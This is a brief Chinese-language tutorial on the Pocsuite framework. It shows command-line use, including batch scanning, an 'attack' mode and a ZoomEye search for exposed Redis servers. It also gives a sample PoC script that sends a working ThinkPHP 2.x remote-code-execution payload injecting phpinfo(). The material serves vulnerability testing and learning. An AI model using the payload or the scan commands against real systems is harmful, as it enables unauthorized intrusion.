pocsuite使用教程

Pocsuite使用教程

1.常用命令

# Verify验证模式
python cli.py -r pocs/test1.py(poc脚本路径) -u http://127.0.0.1 --verify

# 批量验证
python cli.py -r pocs/test1.py  -f url.txt --verify

# 加载文件夹下所有的poc对目标进行测试
python cli.py -r pocs/* -u http://127.0.0.1 --verify

# 使用多线程
python cli.py -r pocs/* -u https://127.0.0.1 --verify --threads 10

# 使用Zoomeye搜索引擎，搜索开放端口为6379的Redis服务
python cli.py --dork 'port:6379' --vul-keyword 'redis' -max-page 2

# Attack模式，向目标发起有效攻击
python pocsuite.py -r pocs/(poc脚本路径) -u https://127.0.0.1 --attack

2.poc编写

from pocsuite3.api import Output, POCBase,register_poc,requests,logger
from pocsuite3.api import get_listener_ip,get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD

class DemoPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'wcs'
    vulDate = '2022-04-16'
    createDate = '2022-04-16'
    updateDate = '2022-04-16'
    references = []
    name = 'thinkphp 2-rce 任意代码执行漏洞'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = '任意代码执行'
    desc = '''
        练习pocsuite    
    '''
    samples = []
    install_requires = []

    def _verify(self):
        output = Output(self)
        result = {}   # 验证代码
        payload = "/index.php?s=/index/index/name/${phpinfo()}"
        url = self.url
        try:
            resq = requests.get(url+payload)
            if resq and resq.status_code == 200 and "PHP Version" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
    def _attack(self):
        return self._verify()
register_poc(DemoPOC)